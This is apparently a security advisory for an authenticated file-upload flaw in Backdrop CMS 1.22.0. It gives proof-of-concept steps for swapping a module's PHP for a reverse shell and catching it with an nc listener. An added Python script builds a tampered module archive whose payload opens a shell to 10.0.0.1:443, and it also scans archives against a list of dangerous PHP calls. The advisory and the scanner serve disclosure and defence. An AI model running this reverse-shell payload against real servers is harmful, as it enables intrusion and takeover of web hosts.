Backdrop CMS 1.22.0 — Unrestricted File Upload (Modules)

Sep 28, 2022



# An issue was discovered in Backdrop CMS 1.22.0

We found a file upload vulnerability: a malicious file can be uploaded as a module on the Install new modules page. Installing modules requires an administrator account, and Backdrop executes the PHP contained in a module once it is enabled, so the practical impact is code execution on the web server for anyone holding that privilege.

Proof of Concept

1. Log in to the target application with an administrator account.
2. Go to Functionality and choose Install new modules.
3. Click Manual installation. The dialog accepts zip archives.
4. Module archives can be downloaded from the following link.
5. Download the Twitter Filters module and unzip it.
6. Change into the extracted twitter_filters directory.
7. Generate a PowerShell reverse shell payload from
8. Replace the content of twitter_filters.module with the reverse shell payload. A .module file is plain PHP that Backdrop includes when the module is enabled, so whatever is written there runs with the web server's privileges.
9. Zip the twitter_filters directory again.
10. Start an nc listener on port 443.
11. Back in the Manual installation dialog, upload the new archive and click INSTALL.
12. After the installation completes, click Enable newly added modules.
13. The listener receives a shell connection.
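The following script is an added example written for this page; it is not code from the original post or from the Backdrop project. It builds a module archive in the layout Backdrop expects (a directory holding name.info and name.module), once with a harmless .module and once with the .module replaced by attacker PHP, and then scans an archive for PHP members that call shell or socket functions, which is the check a reviewer of uploaded modules would want. The module name twitter_filters comes from the post; the .info contents, the attacker host and port, and the PHP payload (a generic fsockopen/proc_open shell standing in for the PowerShell payload the post used) are all constructed for this example.

```python
"""Build a tampered Backdrop module archive and scan archives for that tampering.

Added example for this write-up, not code from the post or from Backdrop.
"""
import io
import re
import zipfile

MODULE = "twitter_filters"  # module name taken from the post

# Constructed minimal .info file; a real module ships more keys than this.
INFO_FILE = """name = Twitter Filters
description = Constructed metadata for this example
backdrop = 1.x
type = module
"""

# What a legitimate .module plausibly holds: a hook implementation, no OS access.
BENIGN_MODULE = """<?php
function twitter_filters_filter_info() {
  return array();
}
"""

# The attacker's replacement .module. PHP here runs as soon as Backdrop loads the
# enabled module, so a socket back to the listener yields a shell as the web
# server user. Host and port are placeholders, not values from the post; on a
# Windows target the command would be a powershell one-liner instead of /bin/sh.
ATTACKER_HOST = "10.0.0.1"
ATTACKER_PORT = 443
MALICIOUS_MODULE = """<?php
$sock = fsockopen('%s', %d);
$proc = proc_open('/bin/sh -i', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
""" % (ATTACKER_HOST, ATTACKER_PORT)


def build_module_zip(module_file_php):
    """Return zip bytes laid out like a Backdrop module archive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("%s/%s.info" % (MODULE, MODULE), INFO_FILE)
        zf.writestr("%s/%s.module" % (MODULE, MODULE), module_file_php)
    return buf.getvalue()


# PHP functions that hand control to the OS, evaluate code, or open sockets.
DANGEROUS = re.compile(
    r"\b(exec|shell_exec|system|passthru|proc_open|popen|fsockopen|eval)\s*\(",
    re.IGNORECASE,
)
# File extensions Backdrop treats as PHP inside a module directory.
PHP_EXTS = (".php", ".module", ".inc", ".install", ".theme")


def scan_module_zip(data):
    """Map each PHP-executed archive member to the dangerous calls it contains.

    An empty dict means no member called any function in DANGEROUS.
    """
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(PHP_EXTS):
                continue
            src = zf.read(name).decode("utf-8", errors="replace")
            hits = sorted({m.group(1).lower() for m in DANGEROUS.finditer(src)})
            if hits:
                findings[name] = hits
    return findings


if __name__ == "__main__":
    clean = build_module_zip(BENIGN_MODULE)
    tampered = build_module_zip(MALICIOUS_MODULE)
    print("clean archive:", scan_module_zip(clean))
    print("tampered archive:", scan_module_zip(tampered))
```

The scan is a triage aid, not a guarantee: PHP payloads can hide calls behind string concatenation or variable functions, so a clean result only says that no plainly named call was found. The reliable control is the one the post's own prerequisite implies, keeping the module-installation permission restricted to accounts that are trusted with code execution on the server.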


Grim The Ripper Team by SOSECURE Thailand

